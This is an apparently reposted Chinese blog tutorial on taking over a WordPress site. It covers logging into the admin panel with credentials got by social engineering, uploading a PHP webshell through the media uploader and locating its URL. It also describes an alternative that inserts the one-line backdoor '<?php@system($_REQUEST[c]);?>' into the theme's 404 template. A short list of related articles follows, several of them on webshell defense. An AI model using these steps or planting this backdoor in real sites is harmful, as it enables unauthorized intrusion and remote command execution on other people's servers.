wordpress拿WebShell

简介:
wordpressWebShell
Simeon 安天365
   WordPress是世界上用的最多的一款blog,可以说是世界流行,在前段时间爆出有一个任意文件漏洞,但由于时间很忙就没有进行测试,最近偶然拿到一个wordpressblog,实际测试效果不错,下面将整个过程写出来跟朋友分享。
(一)获取管理员用户名和密码
   关于如何获取管理员用户和密码不在本文的主要讨论范围,笔者有两点经验,一个是社工;另外一个就是已有信息的利用;在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。WordPress后台位置一般为:http://www.xxx.com/blog/wp-admin,显示页面如图1所示,输入正确的用户名和密码后顺利登录,如图2所示。
1 WordPress 登录后台
成功登录后台
(二)寻找上传处
  WordPress 管理页面的左边单击“媒体” - “新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“ Browser  上傳功能”,如图 3 所示,直接选择 php Webshell 上传即可。
获取上传页面
(三)浏览上传记录
    上传 Webshell 后,有些系统装有杀毒软件会查杀部分 Webshell ,因此需要通过浏览记录来验证文件是否上传,系统在上传 WebShell 后会自动刷新,如果上传没有出现问题,则会如图 4 所示,上传文件显示在媒体库中。
查看上传的 Webshell 记录
(四)获取 Webshell 的直接地址
     将鼠标移动到上传的 Webshell 记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问 Webshell 的具体页面,如图 5 所示,选择记录中的链接,该链接地址即为真正的 Webshell 地址。
获取上传的 Webshell 页面
(五)获取 WebShell
    直接打开 Webshell 的地址,输入密码验证成功后,进入熟悉的 Webshell 界面,如图 6 所示,至此拿到了 WordPress Webshell
6 获取 WebShell
(六)其他方法获取 Webshell 探讨
    通过询问群里好友,感谢 cnbird 提供的一个方法,不过我测试后未能获取 Webshell ,不知是咋个回事,现将利用方法奉上:
1 )进入后台
2 )单击“外观” - “编辑” - 404 模板”插入一句话木马程序代码 :<?php@system($_REQUEST[c]);?> ,如图 7 所示,插入后进行更新。
3 )使用连接地址 wordpress/wp-content/themes/default/404.php 进行连接。结果没有反应,很是郁闷!
插入一句话代码



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/277369
相关文章
|
云安全 SQL 弹性计算
阿里云提示网站后门发现后门(Webshell)文件的解决办法
2018年10月27日接到新客户网站服务器被上传了webshell脚本木马后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下:
2686 1
阿里云提示网站后门发现后门(Webshell)文件的解决办法
|
6月前
|
存储 关系型数据库 MySQL
如何在网站上安装 WordPress?
如何在网站上安装 WordPress?
105 0
|
6月前
|
存储 安全 关系型数据库
如何让你的 WordPress 网站更安全
如何让你的 WordPress 网站更安全
70 0
|
9月前
|
安全 Java 网络安全
23个常见Webshell网站管理工具
23个常见Webshell网站管理工具
522 0
|
监控 安全 数据安全/隐私保护
如何防止您的 WordPress 网站被黑客入侵?WordPress安全吗?
很多企业都很重视网站的安全性问题,很担心被挂码,或者网站被客户共计,虽然没有 100% 保证安全的站点这样的东西,但您可以采取一些措施来尽可能地强化站点。那么如何防止您的 WordPress 网站被黑客入侵?WordPress安全吗?[北京六翼信息技术有限公司](https://www.joowp.com/)joowp。Com的开发工程师给大家几点预防黑客入侵的建议。
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
176 0
|
存储 安全 网络安全
web渗透_一句话木马(webshell)_dvwa环境
web渗透_一句话木马(webshell)_dvwa环境
web渗透_一句话木马(webshell)_dvwa环境
|
SQL 安全 关系型数据库
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
433 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
|
SQL 存储 安全
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
410 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
|
安全 数据库 数据安全/隐私保护
WordPress代码最新网站漏洞修复探讨
2020年,刚刚开始WordPress博客系统被网站安全检测出有插件绕过漏洞,该插件的开发公司,已升级了该插件并发布1.7版本,对以前爆出的漏洞进行了修补,该企业网站漏洞造成的原因是未经许可身份认证的普通用户给以了系统管理员权限。黑客能够以网站管理员的身份进行登陆,并可以将wp企业网站的全部数据表信息恢复为以前的模式,进而上传webshell企业网站木马代码来进行篡改企业网站。现阶段受危害的版本包含最新的WP系统。
175 0
WordPress代码最新网站漏洞修复探讨